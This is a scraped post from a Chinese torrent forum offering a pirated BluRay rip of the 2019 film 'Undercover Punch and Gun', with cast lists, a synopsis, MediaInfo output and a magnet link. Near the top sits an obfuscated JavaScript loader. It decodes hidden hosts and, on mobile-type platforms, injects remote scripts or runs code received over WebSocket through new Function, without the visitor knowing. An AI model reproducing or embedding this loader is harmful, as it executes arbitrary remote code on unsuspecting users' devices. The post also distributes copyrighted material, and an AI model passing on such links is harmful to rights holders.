潜行者[国语配音/粤语配音/中文字幕].Undercover.Punch.and.Gun.2019.1080p.BluRay.x265.10bit.DTS.2Audio 5.54GB

版主小s 1月前 227

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 潜行者 / 卧虎潜龙 / 潜龙狙击 / Undercover vs Undercover / Undercover Punch and Gun
◎年  代 2019
◎产  地 中国大陆 / 中国香港
◎类  别 喜剧 / 动作 / 爱情 / 犯罪
◎语  言 汉语普通话 / 粤语
◎上映日期 2019-06-28(中国大陆)
◎IMDb链接 https://www.imdb.com/title/tt10427010/
◎豆瓣评分 3.3/10 (1991人评价)
◎豆瓣链接 https://movie.douban.com/subject/26827641/
◎片  长 90分钟
◎导  演 吕冠南 Koon-Nam Lui (id:1313441)
       谭广源 Frankie Tam (id:1328638)
◎编  剧 吕冠南 Koon-Nam Lui (id:1313441)
       谭广源 Frankie Tam (id:1328638)
◎演  员 伍允龙 Philip Ng (id:1316267)
       吴建豪 Vanness Wu (id:1201063)
       安志杰 Andy On (id:1045364)
       谢霆锋 Nicholas Tse (id:1050053)
       冯文娟 Wenjuan Feng (id:1325753)
       蒋璐霞 Luxia Jiang (id:1313597)
       赵慧珊 Aka Chio (id:1349931)
       迟帅 Shuai Chi (id:1274879)
       孟佳 Jia (id:1334335)
       伦阿兹 Aaron Aziz (id:1365638)
       吴家丽 Carrie Ng (id:1274241)
       邵音音 Yin-Yin Shaw (id:1297367)
       林雪 Suet Lam (id:1274279)
       陈振华 Ricky Chan (id:1382205)
       王子涵 Ada Wong (id:1341580)
       刘峻纬 Awayne Liu (id:1370237)
       杨天经 Tin King Yeung (id:1352840)
       王冠逸 Lawrence Wong (id:1347952)
       张武孝 Mo-Hau Cheung (id:1364458)
       杰西卡·C Jessica Cambensy (id:1316527)
       黄晖翔 Patrick Wong (id:1349263)
       吴云甫 Owen Ng (id:1365648)
         (id:1383600)
       郭思琳 Magiela Kwok (id:1365647)
       温家伟 Alan Wan (id:1333251)
       林琳奇 Jade Lin (id:1313283)
       陈彼得 Peter Chan (id:1411247)
       肖恩·蒂尔尼 Sean Tierney (id:1419314)
       禤嘉仪 Ivy Huen (id:1440496)
       鲁宗岳 Luke (id:1364301)
       陈嘉上 Gordon Chan (id:1274245)
       伍允龙 Philip Ng (id:1316267)
       邓泰和 Tai Wo Tang (id:1394346)
       伍允龙 Philip Ng (id:1316267)

◎标  签 动作 / 香港 / 犯罪 / 2019 / 安志杰 / 谢霆锋 / 中国大陆 / 中国

◎简  介
  故事开始于卧底警察潜伏黑帮,意外的坐上了黑帮老大的位置,不料被大毒枭设计一步步拖入公海的魔鬼运输船;恰逢此时,一支神秘的第三方部队正在展开他们的复仇之路,命运的纠葛从此开始。在三方力量的角逐中,激烈的搏斗、刀战、枪战、狙击战、遥控炸弹,层层升级步步惊心。在法与情,爱与恨,兄弟和女人之间,有些事情总要有人去做。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 21638956278654872645568491335151592365 (0x104782EA3551EBF910801BB6C78D23AD)

  4. Complete name                            : Underco[email protected]BBQDDQ.COM.mkv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 5.54 GiB

  8. Duration                                 : 1 h 29 min

  9. Overall bit rate                         : 8 813 kb/s

  10. Movie name                               : Undercover Punch And Gun

  11. Encoded date                             : UTC 2021-08-17 04:24:09

  12. Writing application                      : mkvmerge v59.0.0 ('Shining Star') 64-bit

  13. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4

  14. Cover                                    : Yes

  15. Attachments                              : cover.jpg


  16. Video

  17. ID                                       : 1

  18. Format                                   : HEVC

  19. Format/Info                              : High Efficiency Video Coding

  20. Format profile                           : Main [email protected]@Main

  21. Codec ID                                 : V_MPEGH/ISO/HEVC

  22. Duration                                 : 1 h 29 min

  23. Bit rate                                 : 5 768 kb/s

  24. Width                                    : 1 920 pixels

  25. Height                                   : 830 pixels

  26. Display aspect ratio                     : 2.35:1

  27. Frame rate mode                          : Constant

  28. Frame rate                               : 24.000 FPS

  29. Color space                              : YUV

  30. Chroma subsampling                       : 4:2:0

  31. Bit depth                                : 10 bits

  32. Bits/(Pixel*Frame)                       : 0.151

  33. Stream size                              : 3.63 GiB (65%)

  34. Writing library                          : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  35. Encoding settings                        : rc=crf / crf=18.0000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.90 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x830 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  36. Language                                 : Chinese

  37. Default                                  : Yes

  38. Forced                                   : No


  39. Audio #1

  40. ID                                       : 2

  41. Format                                   : DTS

  42. Format/Info                              : Digital Theater Systems

  43. Codec ID                                 : A_DTS

  44. Duration                                 : 1 h 29 min

  45. Bit rate mode                            : Constant

  46. Bit rate                                 : 1 510 kb/s

  47. Channel(s)                               : 6 channels

  48. Channel layout                           : C L R Ls Rs LFE

  49. Sampling rate                            : 48.0 kHz

  50. Frame rate                               : 93.750 FPS (512 SPF)

  51. Bit depth                                : 24 bits

  52. Compression mode                         : Lossy

  53. Stream size                              : 972 MiB (17%)

  54. Title                                    : Cantonese

  55. Language                                 : Chinese

  56. Default                                  : Yes

  57. Forced                                   : No


  58. Audio #2

  59. ID                                       : 3

  60. Format                                   : DTS

  61. Format/Info                              : Digital Theater Systems

  62. Codec ID                                 : A_DTS

  63. Duration                                 : 1 h 29 min

  64. Bit rate mode                            : Constant

  65. Bit rate                                 : 1 510 kb/s

  66. Channel(s)                               : 6 channels

  67. Channel layout                           : C L R Ls Rs LFE

  68. Sampling rate                            : 48.0 kHz

  69. Frame rate                               : 93.750 FPS (512 SPF)

  70. Bit depth                                : 24 bits

  71. Compression mode                         : Lossy

  72. Stream size                              : 972 MiB (17%)

  73. Title                                    : Mandarin

  74. Language                                 : Chinese

  75. Default                                  : No

  76. Forced                                   : No


  77. Text #1

  78. ID                                       : 4

  79. ID in the original source medium         : 4609 (0x1201)

  80. Format                                   : PGS

  81. Muxing mode                              : zlib

  82. Codec ID                                 : S_HDMV/PGS

  83. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  84. Duration                                 : 1 h 24 min

  85. Bit rate                                 : 20.2 kb/s

  86. Count of elements                        : 1402

  87. Stream size                              : 12.2 MiB (0%)

  88. Title                                    : chs

  89. Language                                 : Chinese

  90. Default                                  : Yes

  91. Forced                                   : No

  92. Original source medium                   : Blu-ray


  93. Text #2

  94. ID                                       : 5

  95. ID in the original source medium         : 4608 (0x1200)

  96. Format                                   : PGS

  97. Muxing mode                              : zlib

  98. Codec ID                                 : S_HDMV/PGS

  99. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  100. Duration                                 : 1 h 24 min

  101. Bit rate                                 : 20.6 kb/s

  102. Count of elements                        : 1402

  103. Stream size                              : 12.4 MiB (0%)

  104. Title                                    : cht

  105. Language                                 : Chinese

  106. Default                                  : No

  107. Forced                                   : No

  108. Original source medium                   : Blu-ray


  109. Text #3

  110. ID                                       : 6

  111. ID in the original source medium         : 4610 (0x1202)

  112. Format                                   : PGS

  113. Muxing mode                              : zlib

  114. Codec ID                                 : S_HDMV/PGS

  115. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  116. Duration                                 : 1 h 25 min

  117. Bit rate                                 : 24.3 kb/s

  118. Count of elements                        : 1412

  119. Stream size                              : 14.8 MiB (0%)

  120. Title                                    : eng

  121. Language                                 : English

  122. Default                                  : No

  123. Forced                                   : No

  124. Original source medium                   : Blu-ray


  125. Menu

  126. 00:00:00.000                             : 第 01 章

  127. 00:07:08.708                             : 第 02 章

  128. 00:16:49.250                             : 第 03 章

  129. 00:22:49.458                             : 第 04 章

  130. 00:29:37.708                             : 第 05 章

  131. 00:37:20.583                             : 第 06 章

  132. 00:44:51.541                             : 第 07 章

  133. 00:53:22.000                             : 第 08 章

  134. 01:00:56.625                             : 第 09 章

  135. 01:07:49.375                             : 第 10 章

  136. 01:15:00.541                             : 第 11 章

  137. 01:25:56.458                             : 第 12 章



TAGS 动作 犯罪 喜剧 爱情

磁力链:
  • magnet:?xt=urn:btih:D87AACCE2616D7429879AB9AD6079755458FBE74
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖